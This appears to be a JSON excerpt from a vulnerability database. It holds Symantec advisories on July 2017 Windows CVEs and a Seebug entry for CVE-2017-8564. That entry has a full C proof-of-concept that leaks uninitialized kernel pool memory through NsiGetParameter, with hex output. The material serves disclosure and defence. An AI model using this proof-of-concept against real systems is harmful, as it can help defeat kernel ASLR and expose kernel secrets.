\n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity such as unexplained incoming and outgoing traffic. 
This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99389", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99389", "type": "symantec", "title": "Microsoft Windows Explorer CVE-2017-8463 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:42:14", "bulletinFamily": "software", "cvelist": ["CVE-2017-8495"], "description": "### Description\n\nMicrosoft Windows is prone to a security-bypass vulnerability. Successfully exploiting this issue may allow attackers to bypass certain security restrictions and perform unauthorized actions by conducting a man-in-the-middle attack. 
This may lead to other attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits. \n\n**Implement multiple redundant layers of security.** \nUse of multiple redundant layers of encryption may reduce exposure to this and other latent vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99424", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99424", "type": "symantec", "title": "Microsoft Windows Kerberos CVE-2017-8495 Security Bypass Vulnerability", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-12T14:14:42", "bulletinFamily": "software", "cvelist": ["CVE-2017-8611"], "description": "### Description\n\nMicrosoft Edge is prone to a security vulnerability that may allow attackers to conduct spoofing attacks. An attacker can exploit this issue to conduct spoofing attacks and perform unauthorized actions; other attacks are also possible.\n\n### Technologies Affected\n\n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nNever follow links provided by unknown or untrusted sources.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue allows malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. 
Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99391", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99391", "type": "symantec", "title": "Microsoft Edge CVE-2017-8611 Spoofing Vulnerability", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-03-14T22:42:55", "bulletinFamily": "software", "cvelist": ["CVE-2017-8562"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code in the context of the affected system.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99397", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99397", "type": "symantec", "title": "Microsoft Windows CVE-2017-8562 Local Privilege Escalation Vulnerability", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:40:16", "bulletinFamily": "software", "cvelist": ["CVE-2017-8561"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99426", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99426", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2017-8561 Local Privilege Escalation Vulnerability", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T11:56:44", "description": "We have discovered that the handler of the 0x120007 IOCTL in nsiproxy.sys (\\\\.\\Nsi device) discloses portions of uninitialized pool memory to user-mode clients, likely due to output structure alignment holes.\r\n\r\nOn our test Windows 7 32-bit workstation, an example layout of the output buffer is as follows:\r\n```\r\n--- cut ---\r\n00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ................\r\n00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000090: 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 ................\r\n000000a0: 00 00 00 00 ff 00 ff ff 00 00 00 00 ff ff ff ff ................\r\n000000b0: 00 00 00 00 00 00 00 00 ........\r\n--- cut ---\r\n```\r\nWhere 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode. 
As can be seen, a total of 13 bytes (out of 184) scattered across the structure are disclosed to the client application. The bug manifests itself through a call to the undocumented NSI!NsiGetParameter userland function, in the same fashion that it is called in WSDApi!CWSDInterfaceTable::GetInterfaceProfiles:\r\n```\r\n--- cut ---\r\n.text:6EA52AFF push eax\r\n.text:6EA52B00 push ebx\r\n.text:6EA52B01 lea eax, [ebp+var_BC]\r\n.text:6EA52B07 push eax\r\n.text:6EA52B08 push 0\r\n.text:6EA52B0A push 8\r\n.text:6EA52B0C lea eax, [ebp+InterfaceLuid]\r\n.text:6EA52B12 push eax\r\n.text:6EA52B13 push 7\r\n.text:6EA52B15 push offset _NPI_MS_IPV4_MODULEID\r\n.text:6EA52B1A push 1\r\n.text:6EA52B1C call _NsiGetParameter@36 ; NsiGetParameter(x,x,x,x,x,x,x,x,x)\r\n--- cut ---\r\n```\r\nThe issue can be reproduced by running the attached proof-of-concept program on a system with the Special Pools mechanism enabled for netio.sys. Then, it is clearly visible that bytes at the aforementioned offsets are equal to the markers inserted by Special Pools (0x3d or '=' in this case), and would otherwise contain leftover data that was previously stored in that memory region:\r\n```\r\n--- cut ---\r\nNumber of Adapters: 1\r\n\r\nAdapter Index[0]: 11\r\n00000000: 00 00 00 00 00 01 01 00 00 00 01 01 00[3d 3d 3d].............===\r\n00000010: 00 00 00 00 02 00 00 00 00 00 00 00 0a 00 00 00 ................\r\n00000020: 30 75 00 00 e8 03 00 00 c0 27 09 00 03 00 00 00 0u.......'......\r\n00000030: 01 00 00 00 64 19 00 00 0b 00 00 00 0b 00 00 00 ....d...........\r\n00000040: 0b 00 00 00 0b 00 00 00 01 00 00 00 01 00 00 00 ................\r\n00000050: 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 ................\r\n00000060: 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 ................\r\n00000070: 00 00 00 00 01 00 00 00 dc 05 00 00 40 00 00 00 ............@...\r\n00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000090: 00 00 00 00 00 00 00 00 00[3d 3d 3d]08 
07 00 00 .........===....\r\n000000a0: 01 00 00 00[3d]00[3d 3d]00 00 00 00[3d 3d 3d 3d]....=.==....====\r\n000000b0: 6b 0a 34 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? k.4.............\r\n--- cut ---\r\n```\r\nAt least one local network adapter must be installed on the tested machine to observe the bug. The PoC source code is based on the code sample from https://msdn.microsoft.com/en-us/library/windows/desktop/aa365947(v=vs.85).aspx (in order to list network interfaces) and http://www.nynaeve.net/Code/GetInterfaceMetric.cpp (in order to resolve and call NSI!NsiGetParameter).\r\n\r\nRepeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.\r\n\r\n\r\n### NsippGetParameter.cpp\r\n```\r\n// Based on example code from https://msdn.microsoft.com/en-us/library/windows/desktop/aa365947(v=vs.85).aspx\r\n// and http://www.nynaeve.net/Code/GetInterfaceMetric.cpp.\r\n\r\n#include <winsock2.h>\r\n#include <ws2ipdef.h>\r\n#include <iphlpapi.h>\r\n#include <stdio.h>\r\n#include <objbase.h>\r\n\r\n#pragma comment(lib, \"iphlpapi.lib\")\r\n#pragma comment(lib, \"Ole32.lib\")\r\n\r\n#define MALLOC(x) HeapAlloc(GetProcessHeap(), 0, (x)) \r\n#define FREE(x) HeapFree(GetProcessHeap(), 0, (x))\r\n\r\n/* Note: could also use malloc() and free() */\r\n\r\n//\r\n// Suspected prototype of NsiGetParameter, via reverse engineering.\r\n//\r\n\r\ntypedef DWORD (__stdcall *NsiGetParameterProc)(\r\n DWORD Argument1,\r\n CONST UCHAR* Argument2,\r\n DWORD Argument3,\r\n PNET_LUID Argument4,\r\n DWORD Argument5,\r\n DWORD Argument6,\r\n PUCHAR Argument7,\r\n DWORD Argument8,\r\n DWORD Argument9\r\n );\r\n\r\n/*\r\n0:000> db NPI_MS_IPV4_MODULEID l14\r\n751b3364 18 00 00 00 01 00 00 00-00 4a 00 eb 1a 9b d4 11\r\n751b3374 91 23 00 50 04 77 59 BC\r\n*/\r\n\r\nconst unsigned char NPI_MS_IPV4_MODULEID[0x18] =\r\n{\r\n 0x18, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 
0x4A, 0x00, 0xEB, 0x1A, 0x9B, 0xD4, 0x11,\r\n 0x91, 0x23, 0x00, 0x50, 0x04, 0x77, 0x59, 0xBC\r\n};\r\n\r\nVOID PrintHex(PBYTE Data, ULONG dwBytes) {\r\n for (ULONG i = 0; i < dwBytes; i += 16) {\r\n printf(\"%.8x: \", i);\r\n\r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes) {\r\n printf(\"%.2x \", Data[i + j]);\r\n }\r\n else {\r\n printf(\"?? \");\r\n }\r\n }\r\n\r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {\r\n printf(\"%c\", Data[i + j]);\r\n }\r\n else {\r\n printf(\".\");\r\n }\r\n }\r\n\r\n printf(\"\\n\");\r\n }\r\n}\r\n\r\nint main() {\r\n HMODULE hNsi = LoadLibraryW(L\"Nsi.dll\");\r\n NsiGetParameterProc _NsiGetParameter = (NsiGetParameterProc)GetProcAddress(hNsi, \"NsiGetParameter\");\r\n\r\n // Declare and initialize variables\r\n PIP_INTERFACE_INFO pInfo = NULL;\r\n ULONG ulOutBufLen = 0;\r\n\r\n DWORD dwRetVal = 0;\r\n int iReturn = 1;\r\n\r\n int i;\r\n\r\n // Make an initial call to GetInterfaceInfo to get\r\n // the necessary size in the ulOutBufLen variable\r\n dwRetVal = GetInterfaceInfo(NULL, &ulOutBufLen);\r\n if (dwRetVal == ERROR_INSUFFICIENT_BUFFER) {\r\n pInfo = (IP_INTERFACE_INFO *)MALLOC(ulOutBufLen);\r\n if (pInfo == NULL) {\r\n printf\r\n (\"Unable to allocate memory needed to call GetInterfaceInfo\\n\");\r\n return 1;\r\n }\r\n }\r\n // Make a second call to GetInterfaceInfo to get\r\n // the actual data we need\r\n dwRetVal = GetInterfaceInfo(pInfo, &ulOutBufLen);\r\n if (dwRetVal == NO_ERROR) {\r\n printf(\"Number of Adapters: %ld\\n\\n\", pInfo->NumAdapters);\r\n for (i = 0; i < pInfo->NumAdapters; i++) {\r\n printf(\"Adapter Index[%d]: %ld\\n\", i,\r\n pInfo->Adapter[i].Index);\r\n\r\n NET_LUID Luid;\r\n NETIO_STATUS st = ConvertInterfaceIndexToLuid(pInfo->Adapter[i].Index, &Luid);\r\n if (st == NO_ERROR) {\r\n BYTE OutputBuffer[0xB8] = { /* zero padding */ };\r\n DWORD nsi_st = _NsiGetParameter(1, NPI_MS_IPV4_MODULEID, 7, &Luid, sizeof(Luid), 0, 
OutputBuffer, sizeof(OutputBuffer), 0);\r\n if (nsi_st == NO_ERROR) {\r\n PrintHex(OutputBuffer, sizeof(OutputBuffer));\r\n }\r\n }\r\n }\r\n iReturn = 0;\r\n }\r\n else if (dwRetVal == ERROR_NO_DATA) {\r\n printf\r\n (\"There are no network adapters with IPv4 enabled on the local system\\n\");\r\n iReturn = 0;\r\n }\r\n else {\r\n printf(\"GetInterfaceInfo failed with error: %d\\n\", dwRetVal);\r\n iReturn = 1;\r\n }\r\n\r\n FREE(pInfo);\r\n return (iReturn);\r\n}\r\n```", "published": "2017-07-27T00:00:00", "type": "seebug", "title": "Microsoft Windows Kernel Local Information Disclosure Vulnerability(CVE-2017-8564)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8564"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96315", "id": "SSV:96315", "sourceData": "", "sourceHref": "", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}